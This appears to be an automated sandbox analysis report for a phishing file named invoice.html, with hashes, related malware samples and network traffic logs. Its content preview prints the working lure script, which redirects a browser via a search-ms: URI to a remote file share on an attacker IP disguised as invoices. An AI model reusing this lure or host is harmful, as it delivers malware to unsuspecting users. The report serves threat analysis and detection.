	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	20.198.118.190
	jignesh.exe	Get hash	malicious	Quasar	Browse	20.198.118.190

File type:	HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):	5.249107209706366
TrID:	HTML Application (8008/1) 100.00%
File name:	invoice.html
File size:	148 bytes
MD5:	ddb1087a289ce03eb1ccc691fae37767
SHA1:	ef34f5e6e32c3b3f817f7814d7999d9c68e628b4
SHA256:	ce001834ae69247cca8c9d5688739032c6e71503ce7a83bb1f69eeb540265a25
SHA512:	8cd14425e7c9f5a7f69161117f5630359344fc820b213b824ed59f9d0da877d7f552436e4224b2a8e276f91c1cc8bff7214ef77d777ccb6a34208c84bcda13ad
SSDEEP:	3:gAdpJi0hXUQPH66YctUQ8LUdpzWjbAdD2H3QOkADFoQXsxGXIb:7vJiaXtYkUapzWjbAdD2H2mmjzb
TLSH:	54C08C824E9A609039B746094A02A2CD26A348670A88DA1AB4C0998914BA35EC56A9C0
File Content Preview:	<script>.. var url = "search-ms:query=review&crumb=location:\\\\154.216.18.89\&displayname=INVOICES";.. window.location.href = url;.... </script>

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 11:24:43.811754942 CET	443	49713	20.198.119.84	192.168.2.6
Dec 16, 2024 11:24:43.811774969 CET	443	49713	20.198.119.84	192.168.2.6
Dec 16, 2024 11:24:43.812129974 CET	443	49713	20.198.119.84	192.168.2.6
Dec 16, 2024 11:24:44.238122940 CET	443	49713	20.198.119.84	192.168.2.6
Dec 16, 2024 11:24:44.286175966 CET	49713	443	192.168.2.6	20.198.119.84
Dec 16, 2024 11:24:44.430053949 CET	443	49713	20.198.119.84	192.168.2.6
Dec 16, 2024 11:24:44.473727942 CET	49713	443	192.168.2.6	20.198.119.84
Dec 16, 2024 11:24:44.621910095 CET	443	49713	20.198.119.84	192.168.2.6
Dec 16, 2024 11:24:44.623892069 CET	49713	443	192.168.2.6	20.198.119.84
Dec 16, 2024 11:24:44.743633986 CET	443	49713	20.198.119.84	192.168.2.6
Dec 16, 2024 11:24:44.979075909 CET	49674	443	192.168.2.6	173.222.162.64
Dec 16, 2024 11:24:44.989402056 CET	49673	443	192.168.2.6	173.222.162.64
Dec 16, 2024 11:24:45.169928074 CET	443	49713	20.198.119.84	192.168.2.6
Dec 16, 2024 11:24:45.223747015 CET	49713	443	192.168.2.6	20.198.119.84
Dec 16, 2024 11:24:45.317523956 CET	49672	443	192.168.2.6	173.222.162.64
Dec 16, 2024 11:24:47.979134083 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:47.979178905 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:47.979243040 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:47.980272055 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:47.980289936 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:50.226825953 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:50.227014065 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:51.451534986 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:51.451553106 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:51.452053070 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:51.457299948 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:51.457374096 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:51.457380056 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:51.457684994 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:51.503334045 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:52.120754004 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:52.120902061 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:52.121043921 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:52.121499062 CET	49714	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:52.121511936 CET	443	49714	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:54.660832882 CET	49674	443	192.168.2.6	173.222.162.64
Dec 16, 2024 11:24:54.663434982 CET	49673	443	192.168.2.6	173.222.162.64
Dec 16, 2024 11:24:54.991524935 CET	49672	443	192.168.2.6	173.222.162.64
Dec 16, 2024 11:24:55.643837929 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:55.643860102 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:55.643951893 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:55.644550085 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:55.644566059 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:57.312424898 CET	443	49707	173.222.162.64	192.168.2.6
Dec 16, 2024 11:24:57.312650919 CET	49707	443	192.168.2.6	173.222.162.64
Dec 16, 2024 11:24:57.509305954 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:24:57.509356022 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:24:57.509424925 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:24:57.509680986 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:24:57.509695053 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:24:57.883939028 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:57.884016037 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:57.886943102 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:57.886953115 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:57.887234926 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:57.889151096 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:57.889239073 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:57.889245033 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:57.889383078 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:57.935333967 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:58.439475060 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:58.440402031 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:58.440474033 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:58.460170031 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:58.460182905 CET	443	49728	20.198.118.190	192.168.2.6
Dec 16, 2024 11:24:58.460201025 CET	49728	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:24:59.205188990 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:24:59.205523014 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:24:59.205543041 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:24:59.206680059 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:24:59.206732988 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:24:59.207998991 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:24:59.208060026 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:24:59.253519058 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:24:59.253551960 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:24:59.300396919 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:25:02.952094078 CET	49752	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:03.071944952 CET	445	49752	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:03.072066069 CET	49752	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:03.072189093 CET	49752	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:03.191802025 CET	445	49752	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:05.303453922 CET	445	49752	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:05.303566933 CET	49752	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:05.303623915 CET	49752	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:05.348659992 CET	49760	80	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:05.468681097 CET	80	49760	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:05.468756914 CET	49760	80	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:05.468977928 CET	49760	80	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:05.588772058 CET	80	49760	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:06.767620087 CET	80	49760	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:06.769162893 CET	49774	443	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:06.769201994 CET	443	49774	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:06.769520998 CET	49774	443	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:06.771032095 CET	49774	443	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:06.771047115 CET	443	49774	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:06.815537930 CET	49760	80	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:08.198791981 CET	443	49774	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:08.198868036 CET	49774	443	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:08.200552940 CET	49774	443	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:08.200558901 CET	443	49774	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:08.200814009 CET	443	49774	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:08.233916998 CET	49774	443	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:08.233990908 CET	443	49774	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:08.234087944 CET	49774	443	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:08.483378887 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:08.483416080 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:08.483505964 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:08.484414101 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:08.484431982 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:08.918373108 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:08.918458939 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:08.918571949 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:25:10.223576069 CET	49730	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:25:10.223608017 CET	443	49730	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:10.724550009 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:10.724632025 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:10.726773977 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:10.726789951 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:10.727036953 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:10.729434013 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:10.729525089 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:10.729537010 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:10.729990959 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:10.775335073 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:11.252372026 CET	49792	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:11.372296095 CET	445	49792	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:11.372379065 CET	49792	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:11.372669935 CET	49792	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:11.397042990 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:11.397326946 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:11.397404909 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:11.397562981 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:11.397593975 CET	443	49779	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:11.397660971 CET	49779	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:11.492685080 CET	445	49792	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:13.597543001 CET	445	49792	154.216.18.89	192.168.2.6
Dec 16, 2024 11:25:13.597625971 CET	49792	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:13.597662926 CET	49792	445	192.168.2.6	154.216.18.89
Dec 16, 2024 11:25:30.872061014 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:30.872102022 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:30.872209072 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:30.873025894 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:30.873053074 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:33.134566069 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:33.134645939 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:33.136837006 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:33.136843920 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:33.137090921 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:33.139254093 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:33.139381886 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:33.139386892 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:33.139556885 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:33.183336020 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:33.809673071 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:33.809771061 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:33.809870005 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:33.811870098 CET	49848	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:33.811889887 CET	443	49848	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:55.139023066 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:55.139044046 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:55.139112949 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:55.139683008 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:55.139694929 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:57.426480055 CET	49916	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:25:57.426522017 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:57.426605940 CET	49916	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:25:57.426865101 CET	49916	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:25:57.426881075 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:57.437421083 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:57.437485933 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:57.440773964 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:57.440778971 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:57.441056967 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:57.442826033 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:57.442890882 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:57.442895889 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:57.443017960 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:57.483325958 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:58.105802059 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:58.105909109 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:58.106122971 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:58.106301069 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:58.106306076 CET	443	49909	20.198.118.190	192.168.2.6
Dec 16, 2024 11:25:58.106321096 CET	49909	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:25:59.121153116 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:59.121503115 CET	49916	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:25:59.121515036 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:59.122416973 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:59.122773886 CET	49916	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:25:59.122915983 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:25:59.175010920 CET	49916	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:26:08.222078085 CET	49760	80	192.168.2.6	154.216.18.89
Dec 16, 2024 11:26:08.342324018 CET	80	49760	154.216.18.89	192.168.2.6
Dec 16, 2024 11:26:08.342411995 CET	49760	80	192.168.2.6	154.216.18.89
Dec 16, 2024 11:26:08.827291965 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:26:08.827497005 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:26:08.827593088 CET	49916	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:26:10.226129055 CET	49916	443	192.168.2.6	142.250.181.68
Dec 16, 2024 11:26:10.226171017 CET	443	49916	142.250.181.68	192.168.2.6
Dec 16, 2024 11:26:25.112974882 CET	49710	80	192.168.2.6	192.229.221.95
Dec 16, 2024 11:26:25.113169909 CET	49709	80	192.168.2.6	2.22.50.131
Dec 16, 2024 11:26:25.233889103 CET	80	49710	192.229.221.95	192.168.2.6
Dec 16, 2024 11:26:25.233988047 CET	80	49709	2.22.50.131	192.168.2.6
Dec 16, 2024 11:26:25.234008074 CET	49710	80	192.168.2.6	192.229.221.95
Dec 16, 2024 11:26:25.234177113 CET	49709	80	192.168.2.6	2.22.50.131
Dec 16, 2024 11:26:25.594285965 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:25.594330072 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:25.594528913 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:25.595186949 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:25.595216990 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:26.081938028 CET	49708	80	192.168.2.6	192.229.221.95
Dec 16, 2024 11:26:26.082200050 CET	49711	80	192.168.2.6	2.22.50.131
Dec 16, 2024 11:26:26.202163935 CET	80	49708	192.229.221.95	192.168.2.6
Dec 16, 2024 11:26:26.202411890 CET	49708	80	192.168.2.6	192.229.221.95
Dec 16, 2024 11:26:26.202691078 CET	80	49711	2.22.50.131	192.168.2.6
Dec 16, 2024 11:26:26.202831984 CET	49711	80	192.168.2.6	2.22.50.131
Dec 16, 2024 11:26:27.816232920 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:27.816349030 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:27.818511009 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:27.818519115 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:27.819307089 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:27.821099997 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:27.821162939 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:27.821166992 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:27.821278095 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:27.867336035 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:28.483277082 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:28.483467102 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:28.483654022 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:28.483920097 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:26:28.483937025 CET	443	49984	20.198.118.190	192.168.2.6
Dec 16, 2024 11:26:28.483943939 CET	49984	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:02.499042034 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:02.499110937 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:02.499188900 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:02.500063896 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:02.500097990 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:04.718794107 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:04.718894958 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:04.720904112 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:04.720926046 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:04.721173048 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:04.723196983 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:04.723263025 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:04.723272085 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:04.723383904 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:04.767338037 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:05.267541885 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:05.267628908 CET	443	50047	20.198.118.190	192.168.2.6
Dec 16, 2024 11:27:05.267700911 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:05.267940998 CET	50047	443	192.168.2.6	20.198.118.190
Dec 16, 2024 11:27:05.267960072 CET	443	50047	20.198.118.190	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 11:24:53.591511965 CET	53	56320	1.1.1.1	192.168.2.6
Dec 16, 2024 11:24:53.696805954 CET	53	51439	1.1.1.1	192.168.2.6
Dec 16, 2024 11:24:56.465245008 CET	53	52895	1.1.1.1	192.168.2.6
Dec 16, 2024 11:24:57.365577936 CET	62436	53	192.168.2.6	1.1.1.1
Dec 16, 2024 11:24:57.366003036 CET	60987	53	192.168.2.6	1.1.1.1
Dec 16, 2024 11:24:57.504625082 CET	53	62436	1.1.1.1	192.168.2.6
Dec 16, 2024 11:24:57.508232117 CET	53	60987	1.1.1.1	192.168.2.6
Dec 16, 2024 11:25:06.158591986 CET	53	50208	1.1.1.1	192.168.2.6
Dec 16, 2024 11:25:13.500967979 CET	53	52631	1.1.1.1	192.168.2.6
Dec 16, 2024 11:25:32.595489979 CET	53	57088	1.1.1.1	192.168.2.6
Dec 16, 2024 11:25:53.198525906 CET	53	56285	1.1.1.1	192.168.2.6
Dec 16, 2024 11:25:55.205641031 CET	53	57377	1.1.1.1	192.168.2.6
Dec 16, 2024 11:26:25.001621962 CET	53	57346	1.1.1.1	192.168.2.6
Dec 16, 2024 11:27:10.174650908 CET	53	65105	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 11:24:57.365577936 CET	192.168.2.6	1.1.1.1	0x79ed	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:24:57.366003036 CET	192.168.2.6	1.1.1.1	0x149f	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 11:24:57.504625082 CET	1.1.1.1	192.168.2.6	0x79ed	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:24:57.508232117 CET	1.1.1.1	192.168.2.6	0x149f	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

tse1.mm.bing.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49760	154.216.18.89	80	3404	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:25:05.468977928 CET	102	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: DavClnt translate: f Host: 154.216.18.89
Dec 16, 2024 11:25:06.767620087 CET	352	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 16 Dec 2024 10:25:06 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://154.216.18.89/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49714	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:24:51 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 47 5a 51 7a 79 64 4e 78 30 32 34 73 75 73 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 37 37 35 36 63 33 39 63 31 64 32 39 38 63 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: cGZQzydNx024susR.1Context: a77756c39c1d298c
2024-12-16 10:24:51 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
